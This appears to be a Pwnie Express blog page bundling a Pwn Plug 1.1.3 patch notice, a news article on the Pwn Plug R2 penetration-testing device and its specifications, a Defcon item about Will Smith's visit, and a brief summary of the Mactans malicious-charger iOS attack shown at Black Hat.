Pwn Plug / Power Pwn updated to 1.1.3

We’re back from Vegas in (mostly) full force, and wanted to let you know we’ve released an update for the Pwn Plug and Power Pwn, 1.1.3:

  • Fixes the security issue originally reported by Wesley McGrew at Defcon 21. This is an issue with the PlugUI not properly sanitizing data from the network. This release adds santization.
  • Fixes the updating of the Metasploit framework to pull directly from Pwnie Express.

You can find details on how to obtain the patch from the downloads page.

Pwn Probe Runs Sneaky New Linux Distro

By Eric Brown

Pwnie Express has opened pre-orders on a Linux-based penetration testing device that supports 4G out-of-band SSH access. The Pwn Plug R2 runs the Kali Linux-based Pwnix distribution on a 1.2GHz Marvell Armada 370 SoC, and offers dual gigabit Ethernet ports, high-gain WiFi and Bluetooth, and a variety of one-click pen-testing tricks, like running the device as an Evil AP.

Pwnie Express sells a number of devices for penetration testing — probing an organization’s security capabilities with a covert snooping device that simulates attacks. The new Pwn Plug R2 is larger, but $100 cheaper than the $995 Pwn Plug Elite. It also adds a second gigabit Ethernet port and a second USB port, as well as an eight-inch antenna.

The Pwn Plug R2 also runs a new version of Linux. Instead of the previous Debian build, it uses a new Pwnix distribution based on Offensive Security’s Debian-derived pen-testing Kali Linux. According an Ars Technica interview with Dave Porcello, CEO of Pwnie Express, at the Black Hat security conference in Las Vegas, Kali Linux is a dramatic improvement over Offensive Security’s previous BackTrack Linux pen-testing distro.

The 5.2 x 3.7 x 0.8-inch Pwn Plug R2 is designed as a “drop box” device that can be sent through the mail and quickly and unobtrusively installed by a novice, and then remotely monitored by a security professional. The device supports pen-testing features like automated bypass of NAC (network access control), 802.1x WiFi, and Cisco RADIUS devices, and the ability to tunnel through firewalls. “One-click” pen-testing techniques are available including establishing the device as an “Evil AP,” as well as implementing stealth mode and passive recon monitoring. The device is claimed to be “unpingable” in stealth mode, and offers no listening ports.

The Pwn Plug R2 runs Pwnix on a Marvell Armada 370, a homegrown ARMv7 SoC design clocked to 1.2GHz that falls between the 1GHz Armada 300 and the 1GHz Cortex-A9-based, dual-core Armada 375. The device ships with 1GB of DDR3 RAM and a 32GB microSD card, and is further equipped with dual gigabit Ethernet ports, dual USB 2.0 ports, and a serial console.

The WiFi and Bluetooth radios are said to be “high gain,” and both seem to make use of the supplied eight-inch antenna. No range claims were provided for WiFi, but the Bluetooth radio can reach a whopping 1,000 feet. According to the Ars Technica story, the Bluetooth adapter can even listen in on mobile Bluetooth communication at distances of up to 3,000 feet if customers add an optional 12-inch 9dBi omnidirectional antenna.

The device also offers an unlocked SIM slot supporting 4G/GSM cards from AT&T, T-mobile, Vodafone, Orange, and GSM carriers in over 160 countries, according to Pwnie Express. The 4G network is said to be used for out-of-band SSH access.

Optional support is provided for other wireless technologies including ZigBee/Z-Wave, RFID, and software-defined radios. According to Ars Technica, a modified version of the open source HackRF SDR device is available as an add-on, although it does not appear in the datasheet.

Specifications listed for the Pwn Plug R2 include:

  • Processor — 1.2GHz Armada 370 (ARMv7)
  • Memory — 1GB DDR3
  • Memory expansion — microSD slot with 32GB card
  • Wireless:
    • 4G/GSM adapter for AT&T, T-Mobile, Vodafone, Orange, and other GSM carriers
    • High-gain 802.11b/g/n
    • 8-inch external antenna
    • External high-gain Bluetooth adapter with 1000-foot range
    • Packet injection & monitor mode for Wifi and Bluetooth
    • Optional Zigbee/Zwave, RFID, and Software-Defined Radio (SDR)
  • Networking — 2x gigabit Ethernet
  • Other I/O: 2x USB 3.0; serial console
  • Firmware/security features:
    • Automated NAC/802.1x/RADIUS bypass
    • Simple web-based administration with “Pwnix UI”
    • One-click Evil AP, stealth mode, & passive recon
    • Out-of-band SSH access over 4G/GSM cell networks
    • Maintains persistent, covert, encrypted SSH access to target network
    • Tunnels through application-aware firewalls & IPS
    • “Unpingable” stealth mode with no listening ports
    • Supports HTTP proxies, SSH-VPN, & OpenVPN
    • OSS-based pentesting toolkit with Metasploit, SET, Kismet, Aircrack-NG, SSLstrip, nmap, Hydra, w3af, Scapy, Ettercap, Bluetooth/VoIP/IPv6 tools, etc.
  • Power — 110-240v (adapters available); consumption 5W idle, 15W max.
  • Dimensions — 5.2 x 3.7 x 0.8 inches
  • Operating system — Pwnix Linux (custom version of Debian-based Kali Linux)

(Original Article)

Will Smith Makes Unexpected Appearance at Defcon Hacker Conference

By Lucian Constantin

Actor Will Smith captured the attention of Defcon attendees when he showed up unexpectedly at the hacker conference on Sunday apparently to do research for an upcoming movie.

The actor attended a talk that featured Apollo Robbins, a renowned sleight-of-hand artist, security consultant and entertainer, who is best known for picking the pockets of Secret Service agents during an encounter with U.S. President Jimmy Carter.

Smith came at the invitation of Robbins, who is coaching him for an upcoming movie, said Chris Hadnagy, the CEO of social engineering consultancy and training firm Social-Engineer and organizer of the Defcon social engineering contest.

According to Hadnagy, Smith was brought in through a back door so he can sit in and hear the talk that he, Robbins and Michele Fincher, another Social-Engineer representative, gave.

The talk included a demonstration of Robbins’ skills, as he called an attendee to the stage and stole his watch, wallet and mobile phone in front of the crowd.

Smith was so impressed with Defcon that he decided to walk around, Hadnagy said. “We went to the vendor area and showed him lock picks, RFID (radio-frequency identification) stuff, Pwnie Express [hacking equipment]—he was thoroughly impressed.”

Smith then visited the Social Engineering Capture the Flag contest room where he greeted some people, gave some autographs and took some pictures, Hadnagy said.

“We showed him some things we did for our [social engineering] class,” Hadnagy said. “He was very interested in how profiling people is done and social engineering. He wanted to understand the human part of hacking.”

Smith had to leave after 20 minutes, otherwise he risked getting mobbed, Defcon founder Jeff Moss said.

There were about 15,000 attendees at Defcon this year, according to the organizers.

It’s not clear if Smith was at the conference doing research for a role in an upcoming movie or for a movie that he plans to produce.

Smith didn’t share the name of the movie, but said that it’s likely that it will be made, Moss said.

Some pictures of Smith at the conference accompanied by Jeff Moss were posted by attendees on Twitter.

(Original Article)


Pwnie Express Founder Dave Porcello & Will Smith

Wolf in Sheep’s Clothing at Black Hat: Getting Pwn’d by Innocent Looking Devices

By Darlene Storm

A trio of researchers presented “Mactans: Injecting Malware into iOS Devices via Malicious Chargers” at Black Hat, demonstrating how an “iOS device can be compromised within one minute” after plugging into a maliciously crafted charger. Until Apple patches the vulnerability that allows the exploit, all iPhone or iPad users are vulnerable as the device does not need to be jailbroken for the attack to work. It takes advantage of an iOS flaw that allows pairing without any notification to the user.

Their proof-of-concept charger, dubbed Mactans, was built using a $45BeagleBoard. As soon as an iOS device is plugged in, the fake charger instantly captures the Unique Device Identifier (UDID). Then it connects to Apple’s developer support website and submits that UDID for a “provisioning profile.” The charger installs code and the attacker now has full control of the device. GTISC associate director Paul Royal said, “Getting the UDID is trivial, and getting a provisioning profile is easy and automated.”

(Original Article)